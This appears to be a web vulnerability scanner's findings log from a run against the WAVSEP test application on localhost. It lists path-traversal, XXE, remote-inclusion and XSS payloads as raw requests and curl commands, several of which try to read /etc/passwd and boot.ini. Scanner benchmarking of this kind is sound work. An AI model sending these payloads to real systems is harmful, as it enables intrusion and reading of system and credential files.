GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp%00"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Remote inclusion vulnerability via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case01-InjectionDirectlyInToDomXssSinkEval.jsp?userinput=String.fromCharCode%280%2Cw7opwa9j1j%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case01-InjectionDirectlyInToDomXssSinkEval.jsp?userinput=String.fromCharCode%280%2Cw7opwa9j1j%2C1%29"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case02-InjectionDirectlyInToDomXssSinkLocation.jsp?userinput=String.fromCharCode%280%2Cw9k0wzgj32%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case02-InjectionDirectlyInToDomXssSinkLocation.jsp?userinput=String.fromCharCode%280%2Cw9k0wzgj32%2C1%29"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case03-InjectionInToVariableBeingAssignedToDomXssSinkEval.jsp?userinput=String.fromCharCode%280%2Cwpku3ohxtp%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case03-InjectionInToVariableBeingAssignedToDomXssSinkEval.jsp?userinput=String.fromCharCode%280%2Cwpku3ohxtp%2C1%29"
XSS vulnerability found via injection in the parameter userinput
